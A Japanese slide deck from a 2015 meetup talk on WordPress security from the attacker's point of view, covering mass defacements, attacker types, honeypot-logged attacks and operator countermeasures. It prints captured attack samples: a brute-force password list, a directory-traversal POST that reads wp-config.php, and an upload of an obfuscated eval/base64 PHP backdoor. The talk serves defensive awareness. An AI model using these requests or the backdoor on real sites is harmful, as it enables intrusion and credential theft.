Upload
yoshinori-matsumoto
View
583
Download
0
Embed Size (px)
Citation preview
攻撃者からみたWordPressセキュリティ
@ym405nm
さくらのビアバッシュ in 元町 D.E.P.
2015/03/19加筆修正 : 2015/03/20
目次
•現状
•攻撃者を勝手にプロファイリング
•運用者の対策
•まとめ
•おまけ?
現状
現状
• 2013年9月 ロリポップの WordPress が一斉に改ざんされる
• 約8,000件のサイトが被害に
• サイト名が「Hacked by Krad Xin」等に改ざん
現状
• 2015年3月複数のサイトが改ざん
※ タイポ修正w
http://www3.nhk.or.jp/news/html/20150311/k10010011751000.html
攻撃者を勝手にプロファイリング
誰がやってるのか?
• ハクティビスト• 政治的主張など、自分たちの主張を通すためにサイトを改ざんする
• 改ざんしたものを目立つようにアピールする
• マルウェア配布者• 難読化したスクリプトなどを仕込み訪問者にマルウェア感染させる
• 標的型攻撃者グループ• 使用するマルウェアのホスティングとして使用する
• C&Cサーバとして使用する
なぜ攻撃者がWordPressを狙うのか
• 圧倒的なユーザ数
• 行き届かないユーザ管理• 100人以上の編集者を抱えるサイト
• 編集者、管理者の面識がほとんどないサイト
• サードパーティ製ソフトウェアの普及• テーマやプラグイン
• セキュリティレベルはそれぞれの開発者に依存する
どのように狙われているのか
• 攻撃者は弱そうな WordPress を狙っている• wp-content?
• wp-admin?
• 脆弱なソフトウェアを使用しているサイトを探す• メーリングリスト
• 脆弱性売買サイト※ただし WordPress 関連の脆弱性は無料で配布されていることが多い
データを集めてみた
どのように狙われているのか
10
攻撃者
WP WP WP
BOT
サイトとか
Proxy Proxy Proxy ログ解析
投稿
収集
攻撃/スキャン
送信
こんなサイトです
こういうふうに攻撃してくるゾ
• アカウントクラッキング
• wp-config.php 情報の窃取
• ファイルアップロード
こういうふうに攻撃してくるゾ
試行パスワード 回数[server-name]123456 96
[server-name]123 49
[server-name][server-name] 48
[server-name]000000 48
[server-name]111 48
[server-name]111111 48
[server-name]1234 48
[server-name]12345 48
[server-name]12345678 48
[server-name]123abc 48
[server-name]222 48
[server-name]222222 48
[server-name]333 48
[server-name]444 48
[server-name]555 48
[server-name]555555 48
[server-name]666 48
[server-name]666666 48
※ 2014年3月~5月計測傾向は期間によって若干異なります
こういうふうに攻撃してくるゾ
POST /wp-content/themes/(THEME)/dl-skin.php HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux amd64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36Host: serverAccept-Encoding: gzipReferer: http://server/wp-content/themes/ (THEME) /dl-skin.phpAccept-Charset: utf-8,windows-1251;q=0.7,*;q=0.6Accept-Language: en-us,en;q=0.8Keep-Alive: 300Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.4
Content-Length: 60Content-Type: application/x-www-form-urlencoded
( PARAM )=..%2F..%2F..%2F..%2F..%2Fwp-config.php
ディレクトリトラバーサルの脆弱性を使用してwp-config.php の内容を読み取ろうとしている
こういうふうに攻撃してくるゾ
Content-Disposition: form-data; name="Filedata"; filename="ifire.php"Content-Type: text/plain
<?phpeval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX5FBkRxZn0f6q3Gcs+2Ys/abIVOPpfXmRTXvz5R4hjYd08eetcBFr0pQjoAYzFmIynUXP1twBDkLIVp9ku+c7Gx5lyEF*******sO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ=="))); ?>
既知のファイルアップロード機能に認証がない脆弱性を使用してPHPファイルをアップロードしようとしている
アップロードされたファイルはバックドア(攻撃者専用の裏口)として動作する
運用者の対策
運用者の対策
• アカウントの管理をしっかりする• パスワードは強度なものにする
• テーマ / プラグインの選定をする• メンテナンス頻度
• 脆弱性情報への対応頻度
• 不要なものは使用しない
• セキュリティ拡張機能やセキュリティアプライアンスの導入を検討する• セキュリティ関連のプラグインに脆弱性があることも…
運用者の対策
• あわせて対策したい• サーバの選定
• ログの確認(ログイン履歴、アクセスログ)
• 脆弱性情報の収集
まとめ
まとめ
• 今後もWordPressに対する攻撃は減らない
• 攻撃者は既知のテーマ / プラグインの脆弱性を使用することが多い
• アカウントの管理や、テーマ / プラグインの管理をしっかりとする
安全なWordPressライフを!